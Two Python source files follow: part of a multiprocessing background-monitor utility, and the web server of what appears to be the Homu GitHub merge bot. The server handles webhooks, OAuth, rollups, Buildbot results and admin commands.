try:
buffer.append(self._get_internal_queue(block=False))
empty_count = 0
except Empty:
break
empty_count += 1
if empty_count > timeout_count or len(buffer) >= max_items:
break
sleep(throttle_sleep)
return buffer
def put(self, obj):
# GIL will make sure it is atomic
self._q_size += 1
# make sure the block put is done in the thread pool i.e. in the background
obj = pickle.dumps(obj)
self.__thread_pool.get().apply_async(self._q_put, args=(obj, ))
def _q_put(self, obj):
try:
self._q.put(obj)
except BaseException:
# make sure we zero the _q_size of the process dies (i.e. queue put fails)
self._q_size = 0
raise
# GIL will make sure it is atomic
self._q_size -= 1
def _init_reader_thread(self):
if not self._internal_q:
self._internal_q = TrQueue()
if not self._reader_thread or not self._reader_thread.is_alive():
# read before we start the thread
self._reader_thread = Thread(target=self._reader_daemon)
self._reader_thread.daemon = True
self._reader_thread.start()
# if we have waiting results
# wait until thread is up and pushed some results
while not self._reader_thread_started:
sleep(0.2)
# just in case make sure we pulled some stuff if we had any
# todo: wait until a queue is not empty, but for some reason that might fail
sleep(1.0)
def _get_internal_queue(self, *args, **kwargs):
self._init_reader_thread()
obj = self._internal_q.get(*args, **kwargs)
# deserialize
return pickle.loads(obj)
def _reader_daemon(self):
self._reader_thread_started = True
# pull from process queue and push into thread queue
while True:
# noinspection PyBroadException
try:
obj = self._q.get()
if obj is None:
break
except Exception:
break
self._internal_q.put(obj)
@staticmethod
def _pipe_override_send_bytes(self, buf):
n = len(buf)
# For wire compatibility with 3.2 and lower
header = struct.pack("!i", n)
# Issue #20540: concatenate before sending, to avoid delays due
# to Nagle's algorithm on a TCP socket.
# Also note we want to avoid sending a 0-length buffer separately,
# to avoid "broken pipe" errors if the other end closed the pipe.
self._send(header + buf)
class SafeEvent(object):
__thread_pool = SingletonThreadPool()
def __init__(self):
self._event = ProcessEvent()
def is_set(self):
return self._event.is_set()
def set(self):
if not BackgroundMonitor.is_subprocess_enabled() or BackgroundMonitor.is_subprocess_alive():
self._event.set()
# SafeEvent.__thread_pool.get().apply_async(func=self._event.set, args=())
def clear(self):
return self._event.clear()
def wait(self, timeout=None):
return self._event.wait(timeout=timeout)
class SingletonLock(AbstractContextManager):
_instances = []
def __init__(self):
self._lock = None
SingletonLock._instances.append(self)
def acquire(self, *args, **kwargs):
self.create()
return self._lock.acquire(*args, **kwargs)
def release(self, *args, **kwargs):
if self._lock is None:
return None
return self._lock.release(*args, **kwargs)
def create(self):
if self._lock is None:
self._lock = Lock()
@classmethod
def instantiate(cls):
for i in cls._instances:
i.create()
def __enter__(self):
"""Return `self` upon entering the runtime context."""
self.acquire()
return self
def __exit__(self, exc_type, exc_value, traceback):
"""Raise any exception triggered within the runtime context."""
# Do whatever cleanup.
self.release()
if any((exc_type, exc_value, traceback,)):
raise (exc_type, exc_value, traceback)
class BackgroundMonitor(object):
# If we will need multiple monitoring contexts (i.e. subprocesses) this will become a dict
_main_process = None
_main_process_task_id = None
_parent_pid = None
_sub_process_started = None
_instances = {} # type: Dict[int, List[BackgroundMonitor]]
def __init__(self, task, wait_period):
self._event = TrEvent()
self._done_ev = TrEvent()
self._start_ev = TrEvent()
self._task_pid = os.getpid()
self._thread = None
self._wait_timeout = wait_period
self._subprocess = None if task.is_main_task() else False
self._task_id = task.id
self._task_obj_id = id(task.id)
def start(self):
if not self._thread:
self._thread = True
self._event.clear()
self._done_ev.clear()
if self._subprocess is False:
# start the thread we are in threading mode.
self._start()
else:
# append to instances
if self not in self._get_instances():
self._get_instances().append(self)
def wait(self, timeout=None):
if not self._done_ev:
return
self._done_ev.wait(timeout=timeout)
def _start(self):
# if we already started do nothing
if isinstance(self._thread, Thread):
return
self._thread = Thread(target=self._daemon)
self._thread.daemon = True
self._thread.start()
def stop(self):
if not self._thread:
return
if not self.is_subprocess_mode() or self.is_subprocess_alive():
self._event.set()
if isinstance(self._thread, Thread):
try:
self._get_instances().remove(self)
except ValueError:
pass
self._thread = None
def daemon(self):
while True:
if self._event.wait(self._wait_timeout):
break
self._daemon_step()
def _daemon(self):
self._start_ev.set()
self.daemon()
self.post_execution()
self._thread = None
def post_execution(self):
self._done_ev.set()
def set_subprocess_mode(self):
# called just before launching the daemon in a subprocess
if not self._subprocess:
self._subprocess = True
if not isinstance(self._done_ev, SafeEvent):
self._done_ev = SafeEvent()
if not isinstance(self._start_ev, SafeEvent):
self._start_ev = SafeEvent()
if not isinstance(self._event, SafeEvent):
self._event = SafeEvent()
def _daemon_step(self):
pass
@classmethod
def start_all(cls, task, wait_for_subprocess=True):
# noinspection PyProtectedMember
execute_in_subprocess = task._report_subprocess_enabled
if not execute_in_subprocess:
for d in BackgroundMonitor._instances.get(id(task.id), []):
d._start()
elif not BackgroundMonitor._main_process:
cls._parent_pid = os.getpid()
cls._sub_process_started = SafeEvent()
cls._sub_process_started.clear()
cls._main_process_task_id = task.id
# setup
for d in BackgroundMonitor._instances.get(id(task.id), []):
d.set_subprocess_mode()
# todo: solve for standalone spawn subprocess
if ForkContext is not None and isinstance(get_context(), ForkContext):
cls.__start_subprocess_forkprocess(task_obj_id=id(task.id))
else:
cls.__start_subprocess_os_fork(task_obj_id=id(task.id))
# wait until subprocess is up
if wait_for_subprocess:
cls._sub_process_started.wait()
@classmethod
def __start_subprocess_os_fork(cls, task_obj_id):
process_args = (task_obj_id, cls._sub_process_started, os.getpid())
BackgroundMonitor._main_process = os.fork()
# check if we are the child process
if BackgroundMonitor._main_process == 0:
# update to the child process pid
BackgroundMonitor._main_process = os.getpid()
cls._background_process_start(*process_args)
# force to leave the subprocess
leave_process(0)
return
@classmethod
def __start_subprocess_forkprocess(cls, task_obj_id):
_main_process = Process(
target=cls._background_process_start,
args=(task_obj_id, cls._sub_process_started, os.getpid())
)
_main_process.daemon = True
# Hack allow to create daemon subprocesses (even though python doesn't like it)
un_daemonize = False
# noinspection PyBroadException
try:
from multiprocessing import current_process
if current_process()._config.get('daemon'): # noqa
un_daemonize = current_process()._config.get('daemon') # noqa
current_process()._config['daemon'] = False # noqa
except BaseException:
pass
# try to start the background process, if we fail retry again, or crash
for i in range(4):
try:
_main_process.start()
break
except BaseException:
if i < 3:
sleep(1)
continue
raise
BackgroundMonitor._main_process = _main_process.pid
if un_daemonize:
# noinspection PyBroadException
try:
from multiprocessing import current_process
current_process()._config['daemon'] = un_daemonize # noqa
except BaseException:
pass
@classmethod
def _background_process_start(cls, task_obj_id, event_start=None, parent_pid=None):
# type: (int, Optional[SafeEvent], Optional[int]) -> None
is_debugger_running = bool(getattr(sys, 'gettrace', None) and sys.gettrace())
# make sure we update the pid to our own
cls._main_process = os.getpid()
# restore original signal, this will prevent any deadlocks
# Do not change the exception we need to catch base exception as well
# noinspection PyBroadException
try:
from ... import Task
# make sure we do not call Task.current_task() it will create a Task object for us on a subprocess!
# noinspection PyProtectedMember
if Task._has_current_task_obj():
# noinspection PyProtectedMember
Task.current_task()._remove_at_exit_callbacks()
except: # noqa
pass
# if a debugger is running, wait for it to attach to the subprocess
if is_debugger_running:
sleep(3)
instances = BackgroundMonitor._instances.get(task_obj_id, [])
# launch all the threads
for d in instances:
d._start()
if cls._sub_process_started:
cls._sub_process_started.set()
if event_start:
event_start.set()
# wait until we are signaled
for i in instances:
# DO NOT CHANGE, we need to catch base exception, if the process gte's killed
try:
while i._thread and i._thread.is_alive():
# noinspection PyBroadException
try:
p = psutil.Process(parent_pid)
parent_alive = p.is_running() and p.status() != psutil.STATUS_ZOMBIE
except Exception:
parent_alive = False
# if parent process is not here we should just leave!
if not parent_alive:
return
# DO NOT CHANGE, we need to catch base exception, if the process gte's killed
try:
# timeout so we can detect if the parent process got killed.
i._thread.join(timeout=30.)
except: # noqa
break
except: # noqa
pass
# we are done, leave process
return
def is_alive(self):
if self.is_subprocess_mode():
return self.is_subprocess_alive() and self._thread \
and self._start_ev.is_set() and not self._done_ev.is_set()
else:
return isinstance(self._thread, Thread) and self._thread.is_alive()
@classmethod
def is_subprocess_alive(cls, task=None):
if not cls._main_process or (task and cls._main_process_task_id != task.id):
return False
# noinspection PyBroadException
try:
p = psutil.Process(cls._main_process)
return p.is_running() and p.status() != psutil.STATUS_ZOMBIE
except Exception:
current_pid = cls._main_process
if not current_pid:
return False
try:
parent = psutil.Process(cls._parent_pid)
except psutil.Error:
# could not find parent process id
return
for child in parent.children(recursive=True):
# kill ourselves last (if we need to)
if child.pid == current_pid:
return child.is_running() and child.status() != psutil.STATUS_ZOMBIE
return False
def is_subprocess_mode(self):
return self._subprocess is not False and \
bool(self._main_process) and self._task_id == self._main_process_task_id
def _get_instances(self):
return self._instances.setdefault(self._task_obj_id, [])
def _is_subprocess_mode_and_not_parent_process(self):
return self.is_subprocess_mode() and self._parent_pid != os.getpid()
@classmethod
def is_subprocess_enabled(cls, task=None):
return bool(cls._main_process) and (not task or task.id == cls._main_process_task_id)
@classmethod
def clear_main_process(cls, task):
if BackgroundMonitor._main_process_task_id != task.id:
return
cls.wait_for_sub_process(task)
BackgroundMonitor._main_process = None
BackgroundMonitor._main_process_task_id = None
BackgroundMonitor._parent_pid = None
BackgroundMonitor._sub_process_started = None
BackgroundMonitor._instances = {}
SingletonThreadPool.clear()
@classmethod
def wait_for_sub_process(cls, task, timeout=None):
if not cls.is_subprocess_enabled(task=task):
return
for d in BackgroundMonitor._instances.get(id(task.id), []):
d.stop()
tic = time()
while cls.is_subprocess_alive(task=task) and (not timeout or time()-tic < timeout):
sleep(0.03)
def leave_process(status=0):
# type: (int) -> None
"""
Exit current process with status-code (status)
:param status: int exit code
"""
try:
sys.exit(status or 0)
except: # noqa
# ipython/jupyter notebook will not allow to call sys.exit
# we have to call the low level function
os._exit(status or 0) # noqa
|
server.py
|
import hmac
import json
import urllib.parse
from .main import (
PullReqState,
parse_commands,
db_query,
INTERRUPTED_BY_HOMU_RE,
synchronize,
LabelEvent,
)
from . import comments
from . import utils
from .utils import lazy_debug
import github3
import jinja2
import requests
import pkg_resources
from bottle import (
get,
post,
run,
request,
redirect,
abort,
response,
)
from threading import Thread
import sys
import os
import traceback
from retrying import retry
import random
import string
import bottle
bottle.BaseRequest.MEMFILE_MAX = 1024 * 1024 * 10
class G:
pass
g = G()
ROLLUP_STR = {
-2: 'never',
-1: 'iffy',
0: '',
1: 'always',
}
def find_state(sha):
for repo_label, repo_states in g.states.items():
for state in repo_states.values():
if state.merge_sha == sha:
return state, repo_label
raise ValueError('Invalid SHA')
def get_repo(repo_label, repo_cfg):
repo = g.repos[repo_label].gh
if not repo:
repo = g.gh.repository(repo_cfg['owner'], repo_cfg['name'])
g.repos[repo_label].gh = repo
assert repo.owner.login == repo_cfg['owner']
assert repo.name == repo_cfg['name']
return repo
@get('/')
def index():
return g.tpls['index'].render(repos=[g.repos[label]
for label in sorted(g.repos)])
@get('/results/<repo_label:path>/<pull:int>')
def result(repo_label, pull):
if repo_label not in g.states:
abort(404, 'No such repository: {}'.format(repo_label))
states = [state for state in g.states[repo_label].values()
if state.num == pull]
if len(states) == 0:
abort(404, 'No build results for pull request {}'.format(pull))
state = states[0]
builders = []
repo_url = 'https://github.com/{}/{}'.format(
g.cfg['repo'][repo_label]['owner'],
g.cfg['repo'][repo_label]['name'])
for (builder, data) in state.build_res.items():
result = "pending"
if data['res'] is not None:
result = "success" if data['res'] else "failed"
builder_details = {
'result': result,
'name': builder,
}
if data['url']:
builder_details['url'] = data['url']
builders.append(builder_details)
return g.tpls['build_res'].render(repo_label=repo_label, repo_url=repo_url,
builders=builders, pull=pull)
@get('/queue/<repo_label:path>')
def queue(repo_label):
logger = g.logger.getChild('queue')
lazy_debug(logger, lambda: 'repo_label: {}'.format(repo_label))
single_repo_closed = None
treeclosed_src = None
if repo_label == 'all':
labels = g.repos.keys()
multiple = True
repo_url = None
else:
labels = repo_label.split('+')
multiple = len(labels) > 1
if repo_label in g.repos and g.repos[repo_label].treeclosed >= 0:
single_repo_closed = g.repos[repo_label].treeclosed
treeclosed_src = g.repos[repo_label].treeclosed_src
repo_url = 'https://github.com/{}/{}'.format(
g.cfg['repo'][repo_label]['owner'],
g.cfg['repo'][repo_label]['name'])
states = []
for label in labels:
try:
states += g.states[label].values()
except KeyError:
abort(404, 'No such repository: {}'.format(label))
pull_states = sorted(states)
rows = []
for state in pull_states:
treeclosed = (single_repo_closed and
state.priority < g.repos[state.repo_label].treeclosed)
status_ext = ''
if state.try_:
status_ext += ' (try)'
rows.append({
'status': state.get_status(),
'status_ext': status_ext,
'priority': state.priority,
'rollup': ROLLUP_STR.get(state.rollup, ''),
'url': 'https://github.com/{}/{}/pull/{}'.format(state.owner,
state.name,
state.num),
'num': state.num,
'approved_by': state.approved_by,
'title': state.title,
'head_ref': state.head_ref,
'mergeable': ('yes' if state.mergeable is True else
'no' if state.mergeable is False else ''),
'assignee': state.assignee,
'repo_label': state.repo_label,
'repo_url': 'https://github.com/{}/{}'.format(state.owner,
state.name),
'greyed': "treeclosed" if treeclosed else "",
})
return g.tpls['queue'].render(
repo_url=repo_url,
repo_label=repo_label,
treeclosed=single_repo_closed,
treeclosed_src=treeclosed_src,
states=rows,
oauth_client_id=g.cfg['github']['app_client_id'],
total=len(pull_states),
approved=len([x for x in pull_states if x.approved_by]),
rolled_up=len([x for x in pull_states if x.rollup > 0]),
failed=len([x for x in pull_states if x.status == 'failure' or
x.status == 'error']),
multiple=multiple,
)
@get('/retry_log/<repo_label:path>')
def retry_log(repo_label):
logger = g.logger.getChild('retry_log')
lazy_debug(logger, lambda: 'repo_label: {}'.format(repo_label))
repo_url = 'https://github.com/{}/{}'.format(
g.cfg['repo'][repo_label]['owner'],
g.cfg['repo'][repo_label]['name'],
)
db_query(
g.db,
'''
SELECT num, time, src, msg FROM retry_log
WHERE repo = ? ORDER BY time DESC
''',
[repo_label],
)
logs = [
{'num': num, 'time': time, 'src': src, 'msg': msg}
for num, time, src, msg in g.db.fetchall()
]
return g.tpls['retry_log'].render(
repo_url=repo_url,
repo_label=repo_label,
logs=logs,
)
@get('/callback')
def callback():
logger = g.logger.getChild('callback')
response.content_type = 'text/plain'
code = request.query.code
state = json.loads(request.query.state)
lazy_debug(logger, lambda: 'state: {}'.format(state))
oauth_url = 'https://github.com/login/oauth/access_token'
try:
res = requests.post(oauth_url, data={
'client_id': g.cfg['github']['app_client_id'],
'client_secret': g.cfg['github']['app_client_secret'],
'code': code,
})
except Exception as ex:
logger.warn('/callback encountered an error '
'during github oauth callback')
# probably related to https://gitlab.com/pycqa/flake8/issues/42
lazy_debug(
logger,
lambda ex=ex: 'github oauth callback err: {}'.format(ex),
)
abort(502, 'Bad Gateway')
args = urllib.parse.parse_qs(res.text)
token = args['access_token'][0]
repo_label = state['repo_label']
repo_cfg = g.repo_cfgs[repo_label]
repo = get_repo(repo_label, repo_cfg)
user_gh = github3.login(token=token)
if state['cmd'] == 'rollup':
return rollup(user_gh, state, repo_label, repo_cfg, repo)
elif state['cmd'] == 'synch':
return synch(user_gh, state, repo_label, repo_cfg, repo)
else:
abort(400, 'Invalid command')
def rollup(user_gh, state, repo_label, repo_cfg, repo):
user_repo = user_gh.repository(user_gh.user().login, repo.name)
base_repo = user_gh.repository(repo.owner.login, repo.name)
nums = state.get('nums', [])
if nums:
try:
rollup_states = [g.states[repo_label][num] for num in nums]
except KeyError as e:
return 'Invalid PR number: {}'.format(e.args[0])
else:
rollup_states = [x for x in g.states[repo_label].values() if x.rollup]
rollup_states = [x for x in rollup_states if x.approved_by]
rollup_states.sort(key=lambda x: x.num)
if not rollup_states:
return 'No pull requests are marked as rollup'
base_ref = rollup_states[0].base_ref
base_sha = repo.ref('heads/' + base_ref).object.sha
branch_name = 'rollup-' + ''.join(
random.choice(string.digits + string.ascii_lowercase) for _ in range(7)
)
utils.github_set_ref(
user_repo,
'heads/' + branch_name,
base_sha,
force=True,
)
successes = []
failures = []
for state in rollup_states:
if base_ref != state.base_ref:
failures.append(state.num)
continue
merge_msg = 'Rollup merge of #{} - {}, r={}\n\n{}\n\n{}'.format(
state.num,
state.head_ref,
state.approved_by,
state.title,
state.body,
)
try:
user_repo.merge(branch_name, state.head_sha, merge_msg)
except github3.models.GitHubError as e:
if e.code != 409:
raise
failures.append(state)
else:
successes.append(state)
title = 'Rollup of {} pull requests'.format(len(successes))
body = 'Successful merges:\n\n'
for x in successes:
body += ' - #{} ({})\n'.format(x.num, x.title)
body += '\nFailed merges:\n\n'
for x in failures:
body += ' - #{} ({})\n'.format(x.num, x.title)
body += '\nr? @ghost'
try:
pull = base_repo.create_pull(
title,
state.base_ref,
user_repo.owner.login + ':' + branch_name,
body,
)
except github3.models.GitHubError as e:
return e.response.text
else:
redirect(pull.html_url)
@post('/github')
def github():
logger = g.logger.getChild('github')
response.content_type = 'text/plain'
payload = request.body.read()
info = request.json
lazy_debug(logger, lambda: 'info: {}'.format(utils.remove_url_keys_from_json(info))) # noqa
owner_info = info['repository']['owner']
owner = owner_info.get('login') or owner_info['name']
repo_label = g.repo_labels[owner, info['repository']['name']]
repo_cfg = g.repo_cfgs[repo_label]
hmac_method, hmac_sig = request.headers['X-Hub-Signature'].split('=')
if hmac_sig != hmac.new(
repo_cfg['github']['secret'].encode('utf-8'),
payload,
hmac_method,
).hexdigest():
abort(400, 'Invalid signature')
event_type = request.headers['X-Github-Event']
if event_type == 'pull_request_review_comment':
action = info['action']
original_commit_id = info['comment']['original_commit_id']
head_sha = info['pull_request']['head']['sha']
if action == 'created' and original_commit_id == head_sha:
pull_num = info['pull_request']['number']
body = info['comment']['body']
username = info['sender']['login']
user_id = info['sender']['id']
state = g.states[repo_label].get(pull_num)
if state:
state.title = info['pull_request']['title']
state.body = info['pull_request']['body']
if parse_commands(
body,
username,
user_id,
repo_label,
repo_cfg,
state,
g.my_username,
g.db,
g.states,
realtime=True,
sha=original_commit_id,
command_src=info['comment']['html_url'],
):
state.save()
g.queue_handler()
elif event_type == 'pull_request':
action = info['action']
pull_num = info['number']
head_sha = info['pull_request']['head']['sha']
if action == 'synchronize':
state = g.states[repo_label][pull_num]
state.head_advanced(head_sha)
state.save()
elif action in ['opened', 'reopened']:
state = PullReqState(pull_num, head_sha, '', g.db, repo_label,
g.mergeable_que, g.gh,
info['repository']['owner']['login'],
info['repository']['name'],
repo_cfg.get('labels', {}),
g.repos,
repo_cfg.get('test-on-fork'))
state.title = info['pull_request']['title']
state.body = info['pull_request']['body']
state.head_ref = info['pull_request']['head']['repo']['owner']['login'] + ':' + info['pull_request']['head']['ref'] # noqa
state.base_ref = info['pull_request']['base']['ref']
state.set_mergeable(info['pull_request']['mergeable'])
state.assignee = (info['pull_request']['assignee']['login'] if
info['pull_request']['assignee'] else '')
found = False
if action == 'reopened':
# FIXME: Review comments are ignored here
for c in state.get_repo().issue(pull_num).iter_comments():
found = parse_commands(
c.body,
c.user.login,
c.user.id,
repo_label,
repo_cfg,
state,
g.my_username,
g.db,
g.states,
command_src=c.to_json()['html_url'],
# FIXME switch to `c.html_url`
# after updating github3 to 1.3.0+
) or found
status = ''
for info in utils.github_iter_statuses(state.get_repo(),
state.head_sha):
if info.context == 'homu':
status = info.state
break
state.set_status(status)
state.save()
g.states[repo_label][pull_num] = state
if found:
g.queue_handler()
elif action == 'closed':
state = g.states[repo_label][pull_num]
if hasattr(state, 'fake_merge_sha'):
def inner():
utils.github_set_ref(
state.get_repo(),
'heads/' + state.base_ref,
state.merge_sha,
force=True,
)
def fail(err):
state.add_comment(':boom: Failed to recover from the '
'artificial commit. See {} for details.'
' ({})'.format(state.fake_merge_sha,
err))
utils.retry_until(inner, fail, state)
del g.states[repo_label][pull_num]
db_query(g.db, 'DELETE FROM pull WHERE repo = ? AND num = ?',
[repo_label, pull_num])
db_query(g.db, 'DELETE FROM build_res WHERE repo = ? AND num = ?',
[repo_label, pull_num])
db_query(g.db, 'DELETE FROM mergeable WHERE repo = ? AND num = ?',
[repo_label, pull_num])
g.queue_handler()
elif action in ['assigned', 'unassigned']:
state = g.states[repo_label][pull_num]
state.assignee = (info['pull_request']['assignee']['login'] if
info['pull_request']['assignee'] else '')
state.save()
elif action == 'edited':
state = g.states[repo_label][pull_num]
base_ref = info['pull_request']['base']['ref']
if state.base_ref != base_ref:
state.base_ref = base_ref
state.set_mergeable(None)
# Remove PR approval when the branch changes, to prevent the PR
# authors to merge the changes on other branches
if state.get_status() != '':
state.approved_by = ''
state.set_status('')
state.change_labels(LabelEvent.PUSHED)
state.add_comment(
':warning: The base branch changed to `{}`, and the '
'PR will need to be re-approved.\n\n'
'<!-- @{} r- -->'.format(base_ref, g.my_username)
)
state.title = info['pull_request']['title']
state.body = info['pull_request']['body']
state.save()
else:
lazy_debug(logger, lambda: 'Invalid pull_request action: {}'.format(action)) # noqa
elif event_type == 'push':
ref = info['ref'][len('refs/heads/'):]
for state in list(g.states[repo_label].values()):
if state.base_ref == ref:
state.set_mergeable(None, cause={
'sha': info['head_commit']['id'],
'title': info['head_commit']['message'].splitlines()[0],
})
if state.head_sha == info['before']:
if state.status:
state.change_labels(LabelEvent.PUSHED)
state.head_advanced(info['after'])
state.save()
elif event_type == 'issue_comment':
body = info['comment']['body']
username = info['comment']['user']['login']
user_id = info['comment']['user']['id']
pull_num = info['issue']['number']
state = g.states[repo_label].get(pull_num)
if 'pull_request' in info['issue'] and state:
state.title = info['issue']['title']
state.body = info['issue']['body']
if parse_commands(
body,
username,
user_id,
repo_label,
repo_cfg,
state,
g.my_username,
g.db,
g.states,
realtime=True,
command_src=info['comment']['html_url'],
):
state.save()
g.queue_handler()
elif event_type == 'status':
try:
state, repo_label = find_state(info['sha'])
except ValueError:
return 'OK'
status_name = ""
if 'status' in repo_cfg:
for name, value in repo_cfg['status'].items():
if 'context' in value and value['context'] == info['context']:
status_name = name
if status_name == "":
return 'OK'
if info['state'] == 'pending':
return 'OK'
for row in info['branches']:
if row['name'] == state.base_ref:
return 'OK'
report_build_res(info['state'] == 'success', info['target_url'],
'status-' + status_name, state, logger, repo_cfg)
elif event_type == 'check_run':
try:
state, repo_label = find_state(info['check_run']['head_sha'])
except ValueError:
return 'OK'
current_run_name = info['check_run']['name']
checks_name = None
if 'checks' in repo_cfg:
for name, value in repo_cfg['checks'].items():
if state.try_ and 'try_name' in value:
if value['try_name'] == current_run_name:
checks_name = name
elif 'name' in value and value['name'] == current_run_name:
checks_name = name
if checks_name is None:
return 'OK'
if info['check_run']['status'] != 'completed':
return 'OK'
if info['check_run']['conclusion'] is None:
return 'OK'
# GHA marks jobs as skipped, if they are not run due to the job
# condition. This prevents bors from failing because of these jobs.
if info['check_run']['conclusion'] == 'skipped':
return 'OK'
report_build_res(
info['check_run']['conclusion'] == 'success',
info['check_run']['details_url'],
'checks-' + checks_name,
state, logger, repo_cfg,
)
return 'OK'
def report_build_res(succ, url, builder, state, logger, repo_cfg):
lazy_debug(logger,
lambda: 'build result {}: builder = {}, succ = {}, current build_res = {}' # noqa
.format(state, builder, succ,
state.build_res_summary()))
state.set_build_res(builder, succ, url)
if succ:
if all(x['res'] for x in state.build_res.values()):
state.set_status('success')
utils.github_create_status(
state.get_repo(), state.head_sha,
'success', url, "Test successful", context='homu'
)
if state.approved_by and not state.try_:
state.add_comment(comments.BuildCompleted(
approved_by=state.approved_by,
base_ref=state.base_ref,
builders={k: v["url"] for k, v in state.build_res.items()},
merge_sha=state.merge_sha,
))
state.change_labels(LabelEvent.SUCCEED)
def set_ref():
utils.github_set_ref(state.get_repo(), 'heads/' +
state.base_ref, state.merge_sha)
if state.test_on_fork is not None:
utils.github_set_ref(state.get_test_on_fork_repo(),
'heads/' + state.base_ref,
state.merge_sha, force=True)
try:
try:
set_ref()
except github3.models.GitHubError:
utils.github_create_status(
state.get_repo(),
state.merge_sha,
'success', '',
'Branch protection bypassed',
context='homu')
set_ref()
state.fake_merge(repo_cfg)
except github3.models.GitHubError as e:
state.set_status('error')
desc = ('Test was successful, but fast-forwarding failed:'
' {}'.format(e))
utils.github_create_status(state.get_repo(),
state.head_sha, 'error', url,
desc, context='homu')
state.add_comment(':eyes: ' + desc)
else:
state.add_comment(comments.TryBuildCompleted(
builders={k: v["url"] for k, v in state.build_res.items()},
merge_sha=state.merge_sha,
))
state.change_labels(LabelEvent.TRY_SUCCEED)
else:
if state.status == 'pending':
state.set_status('failure')
utils.github_create_status(
state.get_repo(), state.head_sha,
'failure', url, "Test failed", context='homu'
)
if state.try_:
state.add_comment(comments.TryBuildFailed(
builder_url=url,
builder_name=builder,
))
state.change_labels(LabelEvent.TRY_FAILED)
else:
state.add_comment(comments.BuildFailed(
builder_url=url,
builder_name=builder,
))
state.change_labels(LabelEvent.FAILED)
g.queue_handler()
@post('/buildbot')
def buildbot():
logger = g.logger.getChild('buildbot')
response.content_type = 'text/plain'
for row in json.loads(request.forms.packets):
if row['event'] == 'buildFinished':
info = row['payload']['build']
lazy_debug(logger, lambda: 'info: {}'.format(info))
props = dict(x[:2] for x in info['properties'])
if 'retry' in info['text']:
continue
if not props['revision']:
continue
try:
state, repo_label = find_state(props['revision'])
except ValueError:
lazy_debug(logger,
lambda: 'Invalid commit ID from Buildbot: {}'.format(props['revision'])) # noqa
continue
lazy_debug(logger, lambda: 'state: {}, {}'.format(state, state.build_res_summary())) # noqa
if info['builderName'] not in state.build_res:
lazy_debug(logger,
lambda: 'Invalid builder from Buildbot: {}'.format(info['builderName'])) # noqa
continue
repo_cfg = g.repo_cfgs[repo_label]
if request.forms.secret != repo_cfg['buildbot']['secret']:
abort(400, 'Invalid secret')
build_succ = 'successful' in info['text'] or info['results'] == 0
url = '{}/builders/{}/builds/{}'.format(
repo_cfg['buildbot']['url'],
info['builderName'],
props['buildnumber'],
)
if 'interrupted' in info['text']:
step_name = ''
for step in reversed(info['steps']):
if 'interrupted' in step.get('text', []):
step_name = step['name']
break
if step_name:
try:
url = ('{}/builders/{}/builds/{}/steps/{}/logs/interrupt' # noqa
).format(repo_cfg['buildbot']['url'],
info['builderName'],
props['buildnumber'],
step_name,)
res = requests.get(url)
except Exception as ex:
logger.warn('/buildbot encountered an error during '
'github logs request')
lazy_debug(
logger,
lambda ex=ex: 'buildbot logs err: {}'.format(ex),
)
abort(502, 'Bad Gateway')
mat = INTERRUPTED_BY_HOMU_RE.search(res.text)
if mat:
interrupt_token = mat.group(1)
if getattr(state, 'interrupt_token',
'') != interrupt_token:
state.interrupt_token = interrupt_token
if state.status == 'pending':
state.set_status('')
desc = (':snowman: The build was interrupted '
'to prioritize another pull request.')
state.add_comment(desc)
state.change_labels(LabelEvent.INTERRUPTED)
utils.github_create_status(state.get_repo(),
state.head_sha,
'error', url,
desc,
context='homu')
g.queue_handler()
continue
else:
logger.error('Corrupt payload from Buildbot')
report_build_res(build_succ, url, info['builderName'],
state, logger, repo_cfg)
elif row['event'] == 'buildStarted':
info = row['payload']['build']
lazy_debug(logger, lambda: 'info: {}'.format(info))
props = dict(x[:2] for x in info['properties'])
if not props['revision']:
continue
try:
state, repo_label = find_state(props['revision'])
except ValueError:
pass
else:
if info['builderName'] in state.build_res:
repo_cfg = g.repo_cfgs[repo_label]
if request.forms.secret != repo_cfg['buildbot']['secret']:
abort(400, 'Invalid secret')
url = '{}/builders/{}/builds/{}'.format(
repo_cfg['buildbot']['url'],
info['builderName'],
props['buildnumber'],
)
state.set_build_res(info['builderName'], None, url)
if g.buildbot_slots[0] == props['revision']:
g.buildbot_slots[0] = ''
g.queue_handler()
return 'OK'
@get('/assets/<file:path>')
def server_static(file):
current_path = os.path.dirname(__file__)
return bottle.static_file(file, root=os.path.join(current_path, 'assets'))
def synch(user_gh, state, repo_label, repo_cfg, repo):
try:
if not repo.is_collaborator(user_gh.user().login):
abort(400, 'You are not a collaborator')
except github3.GitHubError as e:
if e.code == 403:
abort(400, 'Homu does not have write access on the repository')
raise e
Thread(target=synchronize, args=[repo_label, repo_cfg, g.logger,
g.gh, g.states, g.repos, g.db,
g.mergeable_que, g.my_username,
g.repo_labels]).start()
return 'Synchronizing {}...'.format(repo_label)
def synch_all():
@retry(wait_exponential_multiplier=1000, wait_exponential_max=600000)
def sync_repo(repo_label, g):
try:
synchronize(repo_label, g.repo_cfgs[repo_label], g.logger, g.gh,
g.states, g.repos, g.db, g.mergeable_que,
g.my_username, g.repo_labels)
except Exception:
print('* Error while synchronizing {}'.format(repo_label))
traceback.print_exc()
raise
for repo_label in g.repos:
sync_repo(repo_label, g)
print('* Done synchronizing all')
@post('/admin')
def admin():
if request.json['secret'] != g.cfg['web']['secret']:
return 'Authentication failure'
if request.json['cmd'] == 'repo_new':
repo_label = request.json['repo_label']
repo_cfg = request.json['repo_cfg']
g.states[repo_label] = {}
g.repos[repo_label] = None
g.repo_cfgs[repo_label] = repo_cfg
g.repo_labels[repo_cfg['owner'], repo_cfg['name']] = repo_label
Thread(target=synchronize, args=[repo_label, repo_cfg, g.logger,
g.gh, g.states, g.repos, g.db,
g.mergeable_que, g.my_username,
g.repo_labels]).start()
return 'OK'
elif request.json['cmd'] == 'repo_del':
repo_label = request.json['repo_label']
repo_cfg = g.repo_cfgs[repo_label]
db_query(g.db, 'DELETE FROM pull WHERE repo = ?', [repo_label])
db_query(g.db, 'DELETE FROM build_res WHERE repo = ?', [repo_label])
db_query(g.db, 'DELETE FROM mergeable WHERE repo = ?', [repo_label])
del g.states[repo_label]
del g.repos[repo_label]
del g.repo_cfgs[repo_label]
del g.repo_labels[repo_cfg['owner'], repo_cfg['name']]
return 'OK'
elif request.json['cmd'] == 'repo_edit':
repo_label = request.json['repo_label']
repo_cfg = request.json['repo_cfg']
assert repo_cfg['owner'] == g.repo_cfgs[repo_label]['owner']
assert repo_cfg['name'] == g.repo_cfgs[repo_label]['name']
g.repo_cfgs[repo_label] = repo_cfg
return 'OK'
elif request.json['cmd'] == 'sync_all':
Thread(target=synch_all).start()
return 'OK'
return 'Unrecognized command'
@get('/health')
